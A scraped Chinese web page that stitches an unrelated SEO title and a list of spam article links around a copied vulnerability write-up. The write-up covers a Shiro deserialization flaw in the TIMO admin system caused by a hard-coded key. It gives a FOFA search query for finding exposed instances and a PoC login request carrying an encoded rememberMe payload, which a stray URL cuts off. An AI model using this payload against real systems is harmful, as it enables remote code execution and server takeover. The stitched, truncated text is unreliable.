当前位置: 首页 > news >正文

青浦做网站给公司做企业网站

青浦做网站,给公司做企业网站,宜春市建设局网站,建团购网站0x01 产品简介 TIMO 后台管理系统,基于SpringBoot2.0 + Spring Data Jpa + Thymeleaf + Shiro 开发的后台管理系统,采用分模块的方式便于开发和维护,支持前后台模块分别部署,目前支持的功能有:权限管理、部门管理、字典管理、日志记录、文件上传、代码生成等,为快速开发后…

0x01 产品简介

  TIMO 后台管理系统,基于SpringBoot2.0 + Spring Data Jpa + Thymeleaf + Shiro 开发的后台管理系统,采用分模块的方式便于开发和维护,支持前后台模块分别部署,目前支持的功能有:权限管理、部门管理、字典管理、日志记录、文件上传、代码生成等,为快速开发后台系统而生的脚手架。

0x02 漏洞概述

 TIMO 后台管理系统2.0及之前版本存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。

0x03 复现环境

FOFA:app="TIMO后台管理系统"

0x04 漏洞复现 

PoC

GET /login HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cookie: rememberMe=BaBTqXjRCAeunEoyck90V28hjwrfl81lk1A+MvH49cIndYJNbOyBqi0LYwteXi7gITfe4jMWt5u7spLW4AYwBG/s1fcJLAk2W3GW1RDxWytCigs3Y31jTuNqb7l2r5L
http://www.bjxfkj.com.cn/article/110214.html

相关文章:

  • 家居企业网站建设新闻建设本地端网站
  • 便宜建网站宣传片制作协议
  • 河北省建设执业资格注册管理中心网站wordpress 高级教程
  • 福建省法冶建设知识有奖网站有没有代做毕业设计的网站
  • 网站开发违约责任手机网站跟pc网站有什么不同
  • 公众号申请网站专业制作网站价格
  • 三丰云做网站教程做教育的需要做个网站吗
  • 嘉兴哪家公司做网站比较好的网站seo诊断
  • 在什么网站可以做外贸出口劳保鞋网站建设工作目标
  • 个人做网站赚钱么移动排名提升软件
  • 设计手机界面的网站国外直播做游戏视频网站有哪些
  • 关闭wordpress多站点wordpress主机要求
  • 织梦学校网站源码宁波高等级公路建设指挥部网站
  • 自己电脑做网站必须装jdk重庆网站页面优化
  • 牡丹江市住房和城乡建设局网站上海企业建站提供商
  • 电商网站前端模板濮阳自适应网站建设
  • 企企业业网网站站建建设设惠州建设工程造价管理站网站
  • .net做的网站代码建站教程图解
  • 网站免费如何提高百度关键词排名
  • 简单的英文网站源码上海装饰公司网站建设
  • 腾讯云 网站备案去哪网站备案吗
  • 秦皇岛做网站优化wordpress 主题king
  • 建设公司网站的好处怎么创建小程序商店
  • 查询建设工程规范的网站专业网站设计公司和普通设计公司的区别
  • 班级网站首页设计网站流量能打开wifi打不开
  • 汽车工厂网站建设南通港闸区城乡建设局网站
  • 网站建设公司如何运营wordpress评论点评
  • 备案网站应用服务世界互联网峰会视频
  • 网站开发工作室挣钱吗自己怎么做鲜花网站
  • 央视优购物官方网站酒类网站建设